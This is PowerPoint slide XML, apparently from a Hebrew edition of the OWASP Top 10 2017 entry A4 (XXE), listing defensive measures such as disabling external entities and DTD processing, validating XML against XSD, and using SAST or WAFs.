              <a:t>Detecting and exploiting XXE in SAML Interfaces</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8620" y="3114190"/>
            <a:ext cx="3383280" cy="316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46800" bIns="36000" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>כיצד למנוע את הסיכון</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הדרכת מפתחים מהותית על-מנת לזהות ולמנוע מתקפות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>יתרה מכך, מניעת מתקפת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> מחייבת:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ככל שניתן, השתמש במבנה נתונים פשוט כגון </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, והימנע מהפיכת רצף תווים לאובייקט המקורי עבור מידע רגיש.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>עדכן או שדרג את כל רכיבי תרגום ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> והספריות אשר בשימוש היישום או מערכת ההפעלה. השתמש בבדיקת תלויות. עדכן את ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SOAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> לגרסה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או גרסה עדכנית יותר.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>בטל שימוש בישויות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> חיצוניות ותהליכי עיבוד </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> בכל רכיבי תרגום ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ביישום, בהתאם למסמך </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet 'XXE Prevention'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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יישם בקרת קלטים חיובית (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“white-listing”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) בצד השרת, סינון או הסרה של מידע זדוני בקבצי ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nodes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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וודא כי תהליכי העלאת קבצי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> מוודאים כי כל קובץ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> נכנס מבצע בדיקה למול </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או פתרון דומה לו.</a:t>
            </a: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כלי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>SAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> עשויים לגלות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> בקוד המקור, למרות שבחינת קוד ידנית הינה החלופה הטובה ביותר עבור יישומים גדולים ומורכבים המכילים חיבור למספר רב של יישומים אחרים.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>במידה ובקרות אלו אינן אפשריות, שקול ליישם </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>virtual patching</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API security gateways</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, או </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web Application Firewalls (WAF)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> לגילוי, ניטור וחסימת מתקפות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr tIns="216000" bIns="36000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>A4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
